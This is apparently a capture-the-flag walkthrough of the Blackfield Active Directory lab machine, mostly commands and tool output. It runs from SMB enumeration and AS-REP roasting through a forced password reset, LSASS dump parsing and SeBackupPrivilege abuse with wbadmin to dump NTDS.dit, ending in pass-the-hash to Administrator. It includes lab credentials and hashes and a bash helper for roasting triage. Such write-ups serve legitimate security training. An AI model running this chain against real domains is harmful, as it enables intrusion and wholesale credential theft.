$ nmap -sV -sC -PN -oA blackfield_nmap -p- 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-04 22:37 CEST
Nmap scan report for 10.10.10.192
Host is up (0.022s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-05 03:39:11Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time:
| date: 2025-08-05T03:39:18
|_ start_date: N/A
Based on the scan results above, the target looks like a standard domain controller (DNS, Kerberos, LDAP, SMB and WinRM) with no outside-facing web services to enumerate. Two details in the output matter later: SMB message signing is required, which rules out NTLM relay against this host, and the clock skew of 7 hours is far beyond the 5-minute tolerance Kerberos allows by default, so any Kerberos-based tooling needs the attacking machine's clock synced to the DC first (NTLM authentication is unaffected).
There is an open SMB server on the target. Used smbclient with a null session to enumerate all available shares:
$ smbclient -N -L //10.10.10.192/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Of the shares above, forensic and profiles$ are the interesting ones. forensic isn't accessible anonymously, but profiles$ is, and it holds what looks like one folder per user profile in the domain:
$ smbclient -N //10.10.10.192/profiles$
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
...
A list of likely usernames is valuable at this stage: it turns blind guessing into targeted attacks, and the folder names on this share follow the domain's account naming convention, so they can be used directly as candidate logon names.
Foothold
The quickest route to a domain account from here is to check the user list for accounts vulnerable to AS-REP roasting. An account with "Do not require Kerberos preauthentication" set lets anyone request an AS-REP for it; part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline. Unlike Kerberoasting, this needs no domain credentials, and unlike password spraying it is a single request per user that cannot lock accounts out.
Used impacket-GetNPUsers to enumerate the list of users for any that are ASREPRoastable:
$ impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -no-pass -usersfile users.txt | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:7e0a052bb8bb4023c492cf3833a8198e$3e8355a83f6df1897e9b02f65d59a63958a6940d9a2ffcecb0931f987e176ba009c3fff72d611fc7ec491c98de8de7c84ac2d99b63e7ce4ffd3883f035e00a2dc4ac2efe50e765fc7beb6839eb07e7322bec40e8114970cc1948c227f1db0811ad88dec1265dc3f9d11079c7d976761276680cf6bb20a7cf778b61e6d703dabee55c781fe7aa4819b8824e5fc231d9344a94aed045b8fcbb47427e0fe89a64a0c048b48b5b899d5fbd8205c651b87257fe5c7e5d56f730dba968c897f0b8aa9525f21cf4a986e4205ee4f854fa2133a56ae017761f1f4db0a7e716d8dfdbcb915eb325fae7a8e0f3b30956969b04f6e17b0e8f58
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
GetNPUsers reports KDC_ERR_C_PRINCIPAL_UNKNOWN for names that don't exist in the domain, so filtering those out leaves the three real accounts among the profile names: audit2020, support and svc_backup. Of these, only support has Kerberos preauthentication disabled, so the KDC hands out an AS-REP for it without any authentication, and the encrypted part of that reply is what the $krb5asrep$ line above contains.
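The glue around that command, as an added bash example that is not part of the original writeup: building users.txt from the profiles$ listing, and splitting GetNPUsers' output into the confirmed accounts (the tool echoes a name only for principals that exist) and a hashcat input file. The listing and tool output below are constructed from the excerpts above with a shortened, fake hash, and the file names are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: the text handling around
# GetNPUsers. build_userlist turns an smbclient "dir" listing into candidate
# usernames; triage_npusers splits GetNPUsers output into confirmed accounts
# (stdout) and a hashcat-ready AS-REP hash file.
set -euo pipefail

# Constructed subset of the profiles$ listing quoted above.
SMB_LISTING=$(cat <<'EOF'
  .                                   D        0  Wed Jun  3 18:47:12 2020
  ..                                  D        0  Wed Jun  3 18:47:12 2020
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020
  support                             D        0  Wed Jun  3 18:47:11 2020
  svc_backup                          D        0  Wed Jun  3 18:47:11 2020
  readme.txt                          A       12  Wed Jun  3 18:47:11 2020
EOF
)

# Constructed GetNPUsers output; the hash value is shortened and is not real.
NPUSERS_OUTPUT=$(cat <<'EOF'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:7e0a052bb8bb4023c492cf3833a8198e$3e8355a8deadbeef
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
EOF
)

# Keep directory entries (type column "D"), drop "." and "..". The profile
# folders on this share are named after SAM account names, so each folder
# name is a candidate logon name. (Names containing spaces would need
# smarter parsing; profile folders normally have none.)
build_userlist() {
    awk '$2 == "D" && $1 != "." && $1 != ".." { print $1 }'
}

# GetNPUsers answers differently depending on the principal:
#   unknown name              -> KDC_ERR_C_PRINCIPAL_UNKNOWN (name not echoed)
#   exists, preauth required  -> "[-] User <name> doesn't have UF_DONT_REQUIRE_PREAUTH set"
#   exists, preauth disabled  -> "$krb5asrep$<etype>$<name>@<REALM>:<hash>"
# The last two confirm the account exists; only the last is crackable.
triage_npusers() {
    local hashfile=$1 out
    out=$(cat)
    printf '%s\n' "$out" | grep '^\$krb5asrep\$' > "$hashfile" || true
    printf '%s\n' "$out" | sed -n -E \
        -e 's/^\[-] User ([^ ]+) doesn.t have UF_DONT_REQUIRE_PREAUTH set$/\1/p' \
        -e 's/^\$krb5asrep\$[0-9]+\$([^@]+)@.*/\1/p' | sort -u
}

# Stand-alone demo against the constructed samples.
work=$(mktemp -d)
printf '%s\n' "$SMB_LISTING" | build_userlist > "$work/users.txt"
echo "candidate users: $(wc -l < "$work/users.txt")"
# The live step between the two functions would be:
#   impacket-GetNPUsers blackfield.local/ -dc-ip 10.10.10.192 -no-pass \
#       -usersfile "$work/users.txt" -format hashcat > npusers.out
printf '%s\n' "$NPUSERS_OUTPUT" | triage_npusers "$work/asrep.hashes"
echo "AS-REP hashes for hashcat -m 18200: $(wc -l < "$work/asrep.hashes")"
```

The confirmed-user list is worth keeping even when nothing is roastable: it is the validated input for a later, carefully throttled password spray, and it is far smaller than the raw folder listing.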
Used Hashcat in mode 18200 (Kerberos 5 AS-REP, etype 23) with a wordlist to crack the hash above, which yields the password for support. With a valid domain credential in hand, the next step is to map the domain's objects, group memberships and ACLs with bloodhound-python:
$ bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
...
INFO: Done in 00M 09S
Loaded the results into BloodHound and used the support@blackfield.local account as a starting point.
The First Degree Object Control query shows that support holds ForceChangePassword over audit2020, i.e. it can reset that account's password without knowing the current one.
Used rpcclient as support (setuserinfo2) to set a new password for audit2020. This is a destructive step, since the old password is not recovered and the user will notice, so on a real engagement it needs explicit sign-off. With the new credentials, the forensic share that rejected the null session now opens:
$ smbclient -U blackfield.local\\audit2020 //10.10.10.192/forensic
Password for [BLACKFIELD.LOCAL\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 14:39:08 2020
The folder names describe their contents well; the share looks like it was left over from a security audit. There isn't much of interest in commands_output and tools. The memory_analysis folder contains zipped process memory dumps collected during the audit, including a dump of the LSASS process, which is exactly where cached credentials and the NT hashes of logged-on users live.
Used pypykatz (its lsa minidump parser) to analyze the LSASS dump offline and extract credentials; among them is the NT hash of svc_backup. Since the hash is all NTLM authentication needs, it can be used directly for pass-the-hash with Evil-WinRM over the open WinRM port, and a look at the resulting session's privileges explains why this account is interesting:
*Evil-WinRM* PS C:\Users\svc_backup> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeBackupPrivilege makes for an easy win: it lets the holder read any file on the system regardless of its ACL (by opening it with backup semantics), which is enough to copy the NTDS.dit database and recover every domain password hash, including Administrator's. The one obstacle is that NTDS.dit is held open exclusively by LSASS while the DC runs, so it has to be read from a volume shadow copy rather than in place.
There are several ways of getting hold of NTDS.dit (diskshadow followed by a backup-semantics copy, or a helper such as Copy-FileSeBackupPrivilege). A straightforward option that relies on nothing external is the wbadmin utility, which is already available on the target because the Windows Server Backup feature is installed. wbadmin creates the shadow copy itself, and since it only accepts a volume or a network share as a backup target, the local C$ admin share is addressed by UNC path:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo "Y" | wbadmin start backup -backuptarget:\\dc01\c$\users\svc_backup -include:c:\windows\ntds
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Note: The backed up data cannot be securely protected at this destination.
Backups stored on a remote shared folder might be accessible by other
people on the network. You should only save your backups to a location
where you trust the other users who have access to the location or on a
network that has additional security precautions in place.
Retrieving volume information...
This will back up (C:) (Selected Files) to \\dc01\c$\users\svc_backup.
Do you want to start the backup operation?
[Y] Yes [N] No Y
The backup operation to \\dc01\c$\users\svc_backup is starting.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
The backup of volume (C:) completed successfully.
Summary of the backup operation:
------------------
The backup operation successfully completed.
The backup of volume (C:) completed successfully.
Log of files successfully backed up:
C:\Windows\Logs\WindowsServerBackup\Backup-09-08-2025_02-56-22.log
Once the backup is created, NTDS.dit can be pulled out of it with a selective restore. wbadmin references backups by a version identifier (a timestamp of the form MM/DD/YYYY-HH:MM), which wbadmin get versions lists:
*Evil-WinRM* PS C:\Users\svc_backup> echo "Y" | wbadmin start recovery -version:08/09/2025-02:56 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:c:\users\svc_backup -notrestoreacl
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Retrieving volume information...
You have chosen to recover the file(s) c:\windows\ntds\ntds.dit from the
backup created on 8/8/2025 7:56 PM to c:\users\svc_backup.
Preparing to recover files...
Do you want to continue?
[Y] Yes [N] No Y
Successfully recovered c:\windows\ntds\ntds.dit to c:\users\svc_backup\.
The recovery operation completed.
Summary of the recovery operation:
--------------------
Recovery of c:\windows\ntds\ntds.dit to c:\users\svc_backup\ successfully completed.
Total bytes recovered: 18.00 MB
Total files recovered: 1
Total files failed: 0
NTDS.dit alone is not enough: the hashes inside it are encrypted with the Password Encryption Key (PEK), which is itself protected by the boot key (SYSKEY) stored in the SYSTEM registry hive, so both files are needed. The SYSTEM hive can be exported on the target with the reg utility (reg save HKLM\SYSTEM), an operation that also relies on SeBackupPrivilege. After downloading both files to the attacking machine, secretsdump's LOCAL mode decrypts the database offline:
$ impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
Impacket v0.13.0.dev0+20250808.101048.c62a52e - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b50575181ae5720a2d7a6a73c12c3764:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
Used the Administrator NT hash from the list above for pass-the-hash with Evil-WinRM, which gives a shell as Administrator on the target: